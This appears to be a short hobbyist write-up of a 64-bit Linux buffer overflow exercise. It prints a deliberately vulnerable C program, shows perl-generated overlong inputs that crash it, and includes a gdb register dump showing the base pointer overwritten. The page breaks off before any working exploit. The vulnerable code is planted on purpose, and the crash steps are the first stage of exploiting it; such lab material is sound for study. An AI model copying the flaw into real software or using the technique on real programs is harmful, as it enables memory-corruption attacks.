login
Search
OS : Linux
Distro : Ubuntu 64
Title : AMD64 Wonders
Code "vuln.c" : Thanks to mel @ hitb.
Machine : Seymores AMD 64 Rocks
/* * * mel@hackinthebox.org - this should be the easy one * */ #include int catbuf(char *s1, char *s2) { strncat(s1, s2, BUFSIZ); } int main(int argc, char *argv[]) { char buf[BUFSIZ + 1]; bzero(buf, BUFSIZ); if (argc > 2) catbuf(buf, argv[1]); if (argc > 2) catbuf(buf, argv[1]); return 0; }
xwings@64unix:~$ ls
vuln vuln.c
xwings@64unix:~$ ulimit -c unlimited
xwings@64unix:~$ ./vuln `perl -e 'print "A"x 3000'` A
xwings@64unix:~$ ./vuln `perl -e 'print "A"x 3000'` B
xwings@64unix:~$ ./vuln `perl -e 'print "A"x 30000'` B
Segmentation fault (core dumped)
xwings@64unix:~$ gdb -c core ./vuln
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the
GNU General Public License, and you are
welcome to change it and/or distribute copies
of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type
"show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"
...Using host libthread_db library "/lib/libthread_db.so.1".
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux-x86-64.so.2...done.
Loaded symbols for /lib64/ld-linux-x86-64.so.2
#0 0x0000000000400599 in main ()
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x7fffffff93cf 140737488327631
rdx 0x0 0
rsi 0x7fffffff9698 140737488328344
rdi 0x0 0
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffff73e8 0x7fffffff73e8
r8 0x7fffffff53d0 140737488311248
r9 0x41 65
r10 0x41 65
r11 0x2aaaaac32ee0 46912497725152
r12 0x4005a0 4195744
r13 0x7fffffff74b0 140737488319664
r14 0x0 0
r15 0x0 0
rip 0x400599 0x400599
eflags 0x10206 66054
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
====================================================
WOW ... Quick Snap Shot :p
